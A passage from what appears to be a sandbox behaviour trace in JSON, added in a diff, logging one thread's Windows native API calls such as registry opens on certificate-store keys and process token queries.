"2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1671 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000548" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1672 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1673 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1674 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1675 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1676 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1677 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1678 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1679 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1680 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xe8\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00{!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x04\\xf1[\\x05\\x10\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x80\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xd0\\xf1[\\x053!\\xd6\\xfa\\xb4\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xcc\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x0c\\xf2[\\x05X\\xf4,\\xf2\\xcc\\xf1\\xbc\\xf10\\xf2\\x00\\x00<\\xff\\x00\\x00X\\xf4[\\x05,\\xf2[\\x050\\xf2[\\x05\\x00\\x00\\x00\\x00\\xe0\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x0c\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1681 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1682 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1683 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1684 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1685 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000550" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\" + } + ], + "repeated": 0, + "id": 1686 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1687 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1688 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000554" + } + ], + "repeated": 0, + "id": 1689 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1690 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1691 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1692 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000550" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1693 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1694 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000554" + } + ], + "repeated": 0, + "id": 1695 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1696 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fbb51", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1697 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1698 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1699 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1700 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1701 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1702 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1703 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1704 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1705 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1706 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1707 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1708 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1709 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1710 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xfc\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xfc\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1711 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1712 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1713 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1714 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1715 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1716 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1717 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1718 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1719 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1720 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1721 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xf8\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xf8\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1722 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1723 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1724 + }, + { + 